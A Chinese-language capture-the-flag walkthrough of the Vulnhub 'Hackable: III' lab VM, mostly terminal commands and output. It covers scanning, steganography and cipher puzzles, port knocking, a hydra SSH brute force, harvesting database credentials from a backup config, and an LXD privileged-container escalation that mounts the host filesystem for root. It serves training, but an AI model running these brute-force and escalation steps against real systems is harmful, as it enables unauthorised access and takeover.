【Vulnhub 靶场】【Hackable: III】【简单

1、环境介绍

靶场介绍：https://www.vulnhub.com/entry/hackable-iii,720/
靶场下载：https://download.vulnhub.com/hackable/hackable3.ova
靶场难度：简单 - 中等
发布日期：2021年06月02日
文件大小：1.6 GB
靶场作者：Elias Sousa
靶场系列：Hackable
靶场描述：

关注CTF的一般概念
这与VirtualBox而不是VMware配合使用效果更好。

打靶耗时：4+小时，敲门信息没有注意文件名称，绕了个弯，后面还算是顺畅
打靶关键：

Web 静态检查
Brainfuck 密文解密、图片隐写解析
Knockd 敲门技术、SSH 密码爆破
Linux 信息收集、LXD 提权

2、主机发现与端口扫描

攻击机 IP	192.168.56.3
靶机 IP	192.168.56.39

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.39   08:00:27:8e:97:d6       PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.466 seconds (103.81 hosts/sec). 2 responded

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-21 23:29 EST
Nmap scan report for 192.168.56.39
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/config
|_http-title: Kryptos - LAN Home
MAC Address: 08:00:27:8E:97:D6 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
......Network Distance: 1 hopTRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.56.39OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 22,80 192.168.56.39         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-21 23:31 EST
Nmap scan report for 192.168.56.39
Host is up (0.00067s latency).PORT   STATE    SERVICE
22/tcp filtered ssh
80/tcp open     http
|_http-dombased-xss: Couldn·t find any DOM based XSS.
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.39
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.39:80/login_page/login.html
|     Form id: ckb1
|_    Form action: ../login.php
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.56.39:80/login_page/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/fonts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/fonts/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/fonts/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/fonts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/css/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/css/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/css/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/css/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/images/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/images/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/images/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.56.39:80/login_page/images/?C=S%3BO%3DA%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /login_page/login.html, form·s action: ../login.php. Fields that might be vulnerable:
|       user
|_      remember-me
| http-enum: 
|   /login.php: Possible admin folder
|   /home.html: Possible admin folder
|   /backup/: Backup folder w/ directory listing
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.46 (ubuntu)'
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.46 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.46 (ubuntu)'
MAC Address: 08:00:27:8E:97:D6 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 31.89 seconds

2.1、80端口静态检查

在这里插入图片描述

<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->
<!-- “jubiscleudo，请不要忘记在退出您的部门时激活端口敲门，并告诉老板不要忘记批准 .jpg 文件 - dev_suport@hackable3.com” -->

根据备注，可以获取信息：
1. 可能使用了 Knockd 敲门技术
  1. 需要「3个」端口数字
  2. 默认配置文件位置「/etc/knockd.conf」
2. 「.jpg」可能存在漏洞
3. 获取邮件：dev_suport@hackable3.com
4. 获取用户名：jubiscleudo

3、目录扫描

# 基础小字典，初扫摸底
dirb http://192.168.56.39
# 较全面 conda activate py37
dirsearch -u http://192.168.56.39 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.39" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.39 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包，备份扫描
gobuster dir -u http://192.168.56.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q

http://192.168.56.39/index.html
http://192.168.56.39/robots.txt
http://192.168.56.39/config.php
http://192.168.56.39/home.html
http://192.168.56.39/login.php
http://192.168.56.39/login_page/login.html
http://192.168.56.39/backup/
http://192.168.56.39/config/
http://192.168.56.39/css/
http://192.168.56.39/imagens/
http://192.168.56.39/js/
http://192.168.56.39/login_pag

3.1、信息总结

获取 MySQL 信息

define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_NAME', 'hackable');

获取登录页面信息

<?php
include('config.php');$usuario = $_POST['user'];
$senha = $_POST['pass'];$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'"; 
$result = mysqli_query($conexao, $query);
$row = mysqli_num_rows($result);# valida莽茫o 
contaif($row == 1) {$_SESSION['usuario'] = $usuario;header('Location: 3.jpg');exit();
} else {$_SESSION['nao_autenticado'] = true;header('Location: login_page/login.html');exit();
}
?>

获取字典一个：wordlist.txt
获取密文两个：
- MTAwMDA=
- ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....

┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# echo 'MTAwMDA=' | base64 -d                                          
10000┌──(root㉿kali)-[~/soft] (๑•̀ㅂ•́)و✧ 
└─# python Brainfuck解码.py '++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....'
Brainfuck解码后：4444

4、根据当前信息，尝试登录

任意输入，都会显示下面页面（发现「3.jpg」没有被上面扫描到）

在这里插入图片描述

4.1、分析图片

stegano payload 148505（隐写有效载荷148505）
porta:65535（端口：65535）

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# steghide info 3.jpg
"3.jpg":format: jpegcapacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: embedded file "steganopayload148505.txt":size: 12.0 Byteencrypted: rijndael-128, cbccompressed: yes(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# steghide extract -sf 3.jpg       
Enter passphrase: 
wrote extracted data to "steganopayload148505.txt".(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ls
3.jpg  login.txt  steganopayload148505.txt  wordlist.txt(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat steganopayload148505.txt 
porta:65535

5、根据上面提示「Knockd」

又获取了三个数字：10000（1.txt）、4444（2.txt）、65535（3.jpg）

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh jubiscleudo@192.168.56.39
ssh: connect to host 192.168.56.39 port 22: Connection refused

5.1、依次敲门，找到正确的开门顺序

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# for x in 10000 4444 65535;do nc 192.168.56.39 $x;done
(UNKNOWN) [192.168.56.39] 10000 (webmin) : Connection refused
(UNKNOWN) [192.168.56.39] 4444 (?) : Connection refused
(UNKNOWN) [192.168.56.39] 65535 (?) : Connection refused(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nmap -p 22 192.168.56.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-22 02:06 EST
Nmap scan report for 192.168.56.39
Host is up (0.00091s latency).PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 08:00:27:8E:97:D6 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

6、SSH 密码爆破

jubiscleudo : onlymy

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l jubiscleudo -P wordlist.txt -t 64 192.168.56.39 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-22 02:05:41
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 300 login tries (l:1/p:300), ~5 tries per task
[DATA] attacking ssh://192.168.56.39:22/
[22][ssh] host: 192.168.56.39   login: jubiscleudo   password: onlymy
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 20 final worker threads did not complete until end.
[ERROR] 20 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-22 02:05:53

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh jubiscleudo@192.168.56.39                               
jubiscleudo@192.168.56.39's password: 
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information disabled due to load higher than 1.0* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!https://microk8s.io/0 updates can be installed immediately.
0 of these updates are security updates.The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settingsLast login: Thu Apr 29 16:19:07 2021 from 192.168.2.106
jubiscleudo@ubuntu20:~$

7、信息收集

7.1、基础信息收集

jubiscleudo@ubuntu20:~$ history1  exit2  history
jubiscleudo@ubuntu20:~$ sudo -l
[sudo] password for jubiscleudo: 
Sorry, user jubiscleudo may not run sudo on ubuntu20.
jubiscleudo@ubuntu20:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/snap/core20/1026/usr/bin/ping cap_net_raw=ep
jubiscleudo@ubuntu20:~$ crontab -l
no crontab for jubiscleudo
jubiscleudo@ubuntu20:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
# You can also override PATH, by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
jubiscleudo@ubuntu20:~$ hostnamectlStatic hostname: ubuntu20Icon name: computer-vmChassis: vmMachine ID: 7d693ead326949a6bb91a6600cd9756fBoot ID: 597e4be13ac746c3b6e760d26894bd85Virtualization: oracleOperating System: Ubuntu 21.04Kernel: Linux 5.11.0-16-genericArchitecture: x86-64
jubiscleudo@ubuntu20:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
jubiscleudo@ubuntu20:~$ echo $BASH_VERSION
5.1.4(1)-release

jubiscleudo@ubuntu20:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash

7.2、文件信息收集

jubiscleudo@ubuntu20:~$ ls -al
total 32
drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29  2021 .
drwxr-xr-x 4 root        root        4096 Apr 29  2021 ..
-rw------- 1 jubiscleudo jubiscleudo    5 Apr 29  2021 .bash_history
-rw-r--r-- 1 jubiscleudo jubiscleudo  220 Apr 29  2021 .bash_logout
-rw-r--r-- 1 jubiscleudo jubiscleudo 3771 Apr 29  2021 .bashrc
drwx------ 2 jubiscleudo jubiscleudo 4096 Apr 29  2021 .cache
-rw-r--r-- 1 jubiscleudo jubiscleudo  807 Apr 29  2021 .profile
-rw-r--r-- 1 jubiscleudo jubiscleudo 2984 Apr 27  2021 .user.txt
jubiscleudo@ubuntu20:~$ cat .user.txt
%                                              ,%&&%#.                                              
%                                         *&&&&%%&%&&&&&&%                                          
%                                       &&&&            .%&&&                                       
%                                     &&&#                 %&&&                                     
%                                   /&&&                     &&&.                                   
%                                  %&%/                       %&&*                                  
%                                 .&&#     (%%(,     ,(&&*     %&&                                  
%                                 &&%    %&&&&&&&&&&&&&&%&%#    &&&                                 
%                                 &&%&&&&&&&   #&&&&&*   &&&&&&&%&%                                 
%                                 &&&&&&&&&&&&&&,   /&&&&&&&&&&&&&&                                 
%                                 &&&&&&&%                 &&&&&&&&                                 
%                                  %&&%&&&&              /&&&%&&&%                                  
%                                 &.%&&% %&&%           &&&& %&&/*&                                 
%                              &&&&&&&&&&  %&&&&#   %%&&&&  %&&&&&&&&&                              
%                           /&%&/   *&&&&&&   %&&&&&&%&   &&&&&&.   %&&&.                           
%                          &&&           &&%&           %%%%          .&&&                          
%                         &&%                                           &&&                         
%                        %&&.   *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%&&    /&&(                        
%                       /&&#   #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&*   %&&                        
%                       &&%    ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%     %&%                       
%                      &&&      %&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&      %&&                      
%                      &&&      &&&&&&&&&&&&&&&%&   %&&&&&&&&&&&&&&&%      &&&                      
%                      %&&&%    &&&&&&&&&&&&&&&&     &&&&&&&&&&&&&&&%    &%&&#                      
%                        &&&&&&&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&                        
%                           &%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%                           
%                                &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%                                
%                                *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&                                 
%                                &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%                                
%                                 #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%( invite-me: https://www.linkedin.com/in/eliastouguinho/
jubiscleudo@ubuntu20:~$

jubiscleudo@ubuntu20:~$ find / -user root -perm /4000 2>/dev/null | grep -v '/snap/'
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
jubiscleudo@ubuntu20:~$ find / -perm -u=s -type f 2>/dev/null | grep -v '/snap/'
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1

7.3、用户相关文件信息收集

jubiscleudo@ubuntu20:~$ cd /home/hackable_3
-bash: cd: /home/hackable_3: Permission denied
jubiscleudo@ubuntu20:~$ find / -user hackable_3 2>/dev/null
/home/hackable_3
/scripts
jubiscleudo@ubuntu20:~$ cd /scripts
jubiscleudo@ubuntu20:/scripts$ ls -al
total 72
drwxr-xr-x  2 hackable_3 hackable_3  4096 Jun 30  2021 .
drwxr-xr-x 21 root       root        4096 Apr 29  2021 ..
-rw-r--r--  1 root       root         105 Jun 30  2021 README.txt
-rwxr-xr-x  1 root       root       59653 Apr 28  2021 tetris.sh
jubiscleudo@ubuntu20:/scripts$ cat README.txt|      Don't run tetris.sh（不要玩tetris.sh）|
/_\     Ainda estamos desenvolvendo o game Tetris（我们仍在开发俄罗斯方块游戏）
|_|     Tetris game in development（俄罗斯方块游戏正在开发中）

7.4、依然没有什么太有用的信息

「tetris.sh」没有找到可以用于提权的地方
搜索「关键字」「用户名」「文件内容」

jubiscleudo@ubuntu20:/$ find /var/www -name *config* 2>/dev/null
/var/www/html/config
/var/www/html/config.php
/var/www/html/.backup_config.php
jubiscleudo@ubuntu20:/$ find /var/www -name *backup* 2>/dev/null
/var/www/html/backup
/var/www/html/.backup_config.php
jubiscleudo@ubuntu20:/$ cat /var/www/html/.backup_config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);// Check connection
if($conexao === false){die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>
jubiscleudo@ubuntu20:/$

7.5、登录 hackbale_3 用户

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ssh hackable_3@192.168.56.39
hackable_3@192.168.56.39's password: 
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information disabled due to load higher than 1.0* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!https://microk8s.io/0 updates can be installed immediately.
0 of these updates are security updates.The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settingsLast login: Thu Apr 29 16:19:22 2021 from 192.168.2.106
hackable_3@ubuntu20:~$

8、LXD 提权

hackable_3@ubuntu20:~$ id
uid=1000(hackable_3) gid=1000(hackable_3) groups=1000(hackable_3),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# git clone https://github.com/saghul/lxd-alpine-builder
正克隆到 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
接收对象中: 100% (50/50), 3.11 MiB | 495.00 KiB/s, 完成.
处理 delta 中: 100% (15/15), 完成.(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cd lxd-alpine-builder (base) ┌──(root㉿kali)-[~/soft/hack/lxd-alpine-builder] (๑•̀ㅂ•́)و✧ 
└─# ls    
alpine-v3.13-x86_64-20210218_0139.tar.gz  build-alpine  LICENSE  README.md  rootfs(base) ┌──(root㉿kali)-[~/soft/hack/lxd-alpine-builder] (๑•̀ㅂ•́)و✧ 
└─# python3 -m http.server 80                    
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.39 - - [22/Nov/2023 04:17:30] "GET /alpine-v3.13-x86_64-20210218_0139.tar.gz HTTP/1.1" 200 -

hackable_3@ubuntu20:~$ wget "http://192.168.56.3/alpine-v3.13-x86_64-20210218_0139.tar.gz"
--2023-11-22 09:17:34--  http://192.168.56.3/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’alpine-v3.13-x86_64-20210218_0139.ta 100%[======================================================================>]   3.11M  --.-KB/s    in 0.06s   2023-11-22 09:17:34 (50.8 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]hackable_3@ubuntu20:~$ lxc image import ./alpine*.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm, ceph) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
hackable_3@ubuntu20:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
hackable_3@ubuntu20:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
hackable_3@ubuntu20:~$ lxc start mycontainer
hackable_3@ubuntu20:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/root
/mnt/root/root # ls
knockrestart.sh  root.txt         snap
/mnt/root/root # cat root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
